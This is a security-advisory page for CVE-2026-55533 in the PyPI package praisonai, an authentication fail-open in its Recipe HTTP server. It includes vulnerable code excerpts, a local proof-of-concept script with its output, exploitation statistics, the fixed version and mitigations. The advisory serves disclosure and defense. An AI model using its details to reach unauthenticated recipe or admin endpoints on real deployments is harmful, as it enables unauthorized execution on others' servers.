Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐍
🐍 PyPI
Not in CISA KEV
HIGH severity

CVE-2026-55533 — praisonai

HIGHFix: MervinPraison/PraisonAI@2f9677a

CVE-2026-55533 is a high-severity (CVSS 8.2) Improper Authentication vulnerability in praisonai. A fix is available for praisonai — see the affected versions and patch details below.

PraisonAI: Authentication fail-open in Recipe server allows unauthenticated access when API key or JWT auth is configured without a secret

Also known asGHSA-gfq8-hmph-9gjvPYSEC-2026-3889
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Oct 9, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.

Exploitation and automatability from CISA’s SSVC triage for CVE-2026-55533.

EPSS Exploitation Probability

via FIRST.org ↗
0.5%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs40th percentile — riskier than 40% of all scored CVEsHighest risk
0.00%0.33%0.66%0.99%0.3%0.5%0.5%Sep 26Oct 26Oct 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

CVE-2026-55533 by exploitation likelihood (EPSS) against impact (CVSS). Outside the shaded patch-first corner.

Where this sits among everything scored

Of 385,386 CVEs with a current EPSS score, this one falls in the < 10% band (highlighted). Counts from FIRST.org, log-scaled.

Real-World Exposure

1 pkg affected
🐍praisonai

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The PraisonAI Recipe HTTP server silently allows unauthenticated requests when auth is configured as api-key or jwt but the corresponding secret is missing.

This creates an authentication fail-open condition. An operator can start the Recipe server with authentication enabled, including on a non-localhost interface, but the server still accepts unauthenticated requests if no API key or JWT secret is provided.

The issue is especially risky because the CLI safety check for non-localhost binding only verifies that auth != "none". It does not verify that an actual API key or JWT secret exists.

Details

The Recipe server documents the following authentication modes:

  • none
  • api-key
  • jwt

Relevant source locations:

  • src/praisonai/praisonai/recipe/serve.py
  • src/praisonai/praisonai/cli/features/recipe.py

In create_auth_middleware(), the API key middleware resolves the expected key as:

expected_key = api_key or os.environ.get("PRAISONAI_API_KEY")

if not expected_key:
    # No key configured, allow request
    return await call_next(request)

This means auth: api-key does not enforce authentication if api_key / PRAISONAI_API_KEY is missing.

The JWT middleware has the same fail-open behavior:

secret = jwt_secret or os.environ.get("PRAISONAI_JWT_SECRET")
if not secret:
    return await call_next(request)

The auth middleware is still attached when auth is configured:

auth_type = config.get("auth")
if auth_type and auth_type != "none":
    auth_middleware = create_auth_middleware(
        auth_type,
        api_key=config.get("api_key"),
        jwt_secret=config.get("jwt_secret"),
    )
    if auth_middleware:
        middleware.append(Middleware(auth_middleware))

The CLI path makes this externally reachable in a misconfigured deployment. In cmd_serve, the non-localhost safety check only verifies that auth is not "none":

if host != "127.0.0.1" and host != "localhost" and auth == "none":
    self._print_error("Auth required for non-localhost binding. Use --auth api-key or --auth jwt")
    return self.EXIT_POLICY_DENIED

Therefore, this command passes the safety check:

praisonai recipe serve --host 0.0.0.0 --auth api-key

However, if no --api-key or PRAISONAI_API_KEY is configured, requests are still accepted without authentication.

Affected endpoints include:

  • POST /v1/recipes/run
  • POST /v1/recipes/stream
  • POST /v1/recipes/validate
  • optional POST /admin/reload when enable_admin is true

PoC

The following local PoC verifies that api-key and jwt authentication fail open when the corresponding secret is missing.

Run from the repository root with test dependencies installed:

python3 poc_recipe_auth_fail_open.py

poc_recipe_auth_fail_open.py:

import os
import sys
from pathlib import Path

from starlette.testclient import TestClient

ROOT = Path.cwd()
sys.path.insert(0, str(ROOT / "src" / "praisonai"))
sys.path.insert(0, str(ROOT / "src" / "praisonai-agents"))

# Ensure no secrets are present in the environment.
os.environ.pop("PRAISONAI_API_KEY", None)
os.environ.pop("PRAISONAI_JWT_SECRET", None)

from praisonai.recipe.serve import create_app

# api-key auth selected, but no key configured.
app_open = create_app({"auth": "api-key", "enable_admin": True})
client_open = TestClient(app_open)

print("api-key auth with missing key:")
print("GET /openapi.json:", client_open.get("/openapi.json").status_code)
print("POST /admin/reload:", client_open.post("/admin/reload").status_code)

# api-key auth selected with an actual key configured.
app_closed = create_app({
    "auth": "api-key",
    "api_key": "expected",
    "enable_admin": True,
})
client_closed = TestClient(app_closed)

print("\napi-key auth with configured key:")
print("missing key:", client_closed.post("/admin/reload").status_code)
print("wrong key:", client_closed.post(
    "/admin/reload",
    headers={"X-API-Key": "wrong"},
).status_code)
print("correct key:", client_closed.post(
    "/admin/reload",
    headers={"X-API-Key": "expected"},
).status_code)

# jwt auth selected, but no JWT secret configured.
app_jwt_open = create_app({"auth": "jwt"})
client_jwt_open = TestClient(app_jwt_open)

print("\njwt auth with missing secret:")
print("GET /openapi.json:", client_jwt_open.get("/openapi.json").status_code)

Observed output:

api-key auth with missing key:
GET /openapi.json: 200
POST /admin/reload: 200

api-key auth with configured key:
missing key: 401
wrong key: 401
correct key: 200

jwt auth with missing secret:
GET /openapi.json: 200

The important result is that auth=api-key without a configured key allows requests to protected endpoints, while the same endpoint correctly returns 401 when a key is configured and missing/wrong.

Impact

In an exposed deployment, an unauthenticated attacker can access Recipe server endpoints even though the operator selected api-key or jwt authentication.

This gives unauthenticated access to recipe execution endpoints such as:

  • POST /v1/recipes/run
  • POST /v1/recipes/stream

If admin endpoints are enabled, the attacker can also access:

  • POST /admin/reload

The impact depends on the available recipes and deployment configuration. In the worst case, unauthenticated users can trigger recipe workflows or administrative reload operations on an externally bound Recipe server.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐍PyPIpraisonaiall versions4.6.58pip install --upgrade 'praisonai==4.6.58'

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for praisonai, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update praisonai to 4.6.58 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-55533 is resolved across your whole dependency graph.

  3. Workarounds

    Put an independent control in front of the weakness: restrict the affected endpoint or interface to trusted networks, require an additional authentication factor or proxy-level check, and invalidate existing sessions and credentials in case the flaw has already been used.

Frequently Asked Questions

### Summary The PraisonAI Recipe HTTP server silently allows unauthenticated requests when `auth` is configured as `api-key` or `jwt` but the corresponding secret is missing. This creates an authentication fail-open condition. An operator can start the Recipe server with authentication enabled, including on a non-localhost interface, but the server still accepts unauthenticated requests if no API key or JWT secret is provided. The issue is especially risky because the CLI safety check for non-localhost binding only verifies that `auth != "none"`. It does not verify that an actual API key or
O3 Security · Impact-Aware SCA

Is CVE-2026-55533 in your dependencies?

Find it across PyPI, including transitive dependencies.

CVE-2026-55533: praisonai — Fixed in 4.6.58